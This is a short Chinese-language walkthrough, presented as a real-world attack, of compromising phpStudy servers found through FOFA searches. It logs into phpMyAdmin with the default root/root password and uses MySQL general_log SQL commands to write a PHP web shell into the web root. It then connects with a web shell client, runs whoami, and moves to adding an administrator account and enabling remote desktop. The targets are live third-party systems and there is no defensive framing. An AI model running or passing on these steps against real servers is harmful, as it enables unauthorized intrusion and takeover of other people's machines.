弱口令登录phpmyadmin拿到webshell开启3389登录远程桌面（实战）

前期准备
首先信息收集一波确认目标，：fofa: body=“phpstudy探针” && title=“phpStudy 探针 2014”

找几个心仪的目标下手，打开的页面是这样的

正文
记住这个绝对路径，后面用得上，然后页面拉到最后，使用弱口令对MySQL数据库连接进行检测。一般phpstudy默认配置的mysql账号密码为root/root，直接使用这个去尝试登录

但是这种命中率五五开吧，这个不行，就换一个吧，毕竟这个测试，开头还是需要弱口令进去，或者自己也可以跑字典做其他的尝试，显示这样“连接到MySql数据库正常”就是可以的。
访问：http://xxx.xxx.xxx.229:88/phpmyadmin
弱口令：root root 登录

通过SQL指令来操作
show variables like ‘general_log’; – 查看日志是否开启
set global general_log=on; – 开启日志功能
show variables like ‘general_log_file’; – 看看日志文件保存位置
set global general_log_file=‘tmp/general.lg’; – 设置日志文件保存位置
show variables like ‘log_output’; – 看看日志输出类型 table或file
set global log_output=‘table’; – 设置输出类型为 table
set global log_output=‘file’; – 设置输出类型为file

1.查看日志是否开启：show variables like ‘general_log’; – 查看日志是否开启

2.开启日志：set global general_log=on;

3.查看日志文件保存位置show variables like ‘general_log_file’;

4.修改日志保存路径文件，注意要准确到文件名：set global general_log_file=’ D:/WWW/aaa.php’; //根据实际情况来定

5. 更简单一点的方法，在变量处，找到general_log、general_log_file，然后general_log改成ON、general_log_file改为网站根目录下的文件名:.
6.然后通过日志来写入一句话：
SELECT’’;

7.菜刀连接一句话：

8.连接成功：

9.虚拟终端查看权限：whoami

10.添加管理员用户并开启3389，直接进远程桌面：